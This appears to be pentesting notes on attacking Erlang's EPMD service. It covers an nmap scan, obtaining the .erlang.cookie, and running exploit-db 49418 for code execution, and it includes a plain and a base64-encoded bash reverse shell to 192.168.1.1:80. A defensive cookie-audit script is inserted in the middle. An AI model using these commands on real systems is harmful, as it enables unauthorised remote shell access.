Erlang - 4369
https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd
nmap -sV -Pn -n -T4 -p 4369 --script epmd-info 192.168.1.2
4369/tcp open epmd Erlang Port Mapper Daemon
| epmd-info:
| epmd_port: 4369
| nodes:
|_ rabbit: 65000
65000/tcp open unknown
Erlang Cookie RCE
If you can leak the authentication cookie, you will be able to execute code on the host. This cookie is usually located in ~/.erlang.cookie and is generated by Erlang at the first start.
The scan shows an epmd port and a rabbit service on port 65000. To get RCE we need the .erlang.cookie value. We can brute force it, or we can find it via other services on the host.
.erlang.cookie
JFKERIPLFKVJSQRDIXJS
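A defender-side check for the cookie discussed above, as an added example that is not part of the original notes: it audits a cookie file for permissions wider than owner-only and for a value weak enough to be brute forced. The names `audit_cookie` and `estimate_bits`, the 128-bit threshold and the 20-uppercase-letter pattern for auto-generated cookies are assumptions of this example.

```python
import math
import os
import re
import stat
import string
import sys

# Assumption: an auto-generated cookie is 20 uppercase letters, like the sample above.
DEFAULT_SHAPE = re.compile(r"[A-Z]{20}")
MIN_BITS = 128  # assumed local policy threshold, not an Erlang requirement
CLASSES = (string.ascii_uppercase, string.ascii_lowercase,
           string.digits, string.punctuation)


def estimate_bits(cookie):
    """Upper bound on entropy: length * log2(size of the character classes used)."""
    alphabet = sum(len(c) for c in CLASSES if set(cookie) & set(c))
    return len(cookie) * math.log2(alphabet) if alphabet > 1 else 0.0


def audit_cookie(path):
    """Return a list of findings for one cookie file (empty list: nothing flagged)."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    if mode & 0o077:  # any group/other permission bit exposes the shared secret
        findings.append(f"mode {mode:04o} grants access beyond the owner")
    with open(path, encoding="utf-8", errors="replace") as fh:
        cookie = fh.read().strip()
    if DEFAULT_SHAPE.fullmatch(cookie):
        findings.append("cookie has the auto-generated shape (20 uppercase letters)")
    bits = estimate_bits(cookie)
    if bits < MIN_BITS:
        findings.append(f"cookie holds at most {bits:.0f} bits, below {MIN_BITS}")
    return findings


if __name__ == "__main__":
    # Default path is the location named on this page; pass another path to override.
    target = sys.argv[1] if len(sys.argv) > 1 else os.path.expanduser("~/.erlang.cookie")
    for finding in audit_cookie(target) or ["no findings"]:
        print(f"{target}: {finding}")
```

Run it as the account that owns the Erlang node. Every node in a cluster shares the same cookie, so a replacement value has to be rolled out to all of them together.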
Erlang Cookie - Remote Code Execution
https://www.exploit-db.com/exploits/49418
$ python3 49418
We need to change relevant parts of the code.
TARGET = "192.168.1.2"
PORT = 65000
COOKIE = "JFKERIPLFKVJSQRDIXJS"
CMD = "id"
/bin/bash -i >& /dev/tcp/192.168.1.1/80 0>&1 - Base64 encoded
CMD="echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzE5Mi4xNjguMS4xLzgwIDA+JjE= | base64 -d > shell.sh"
CMD="bash shell.sh"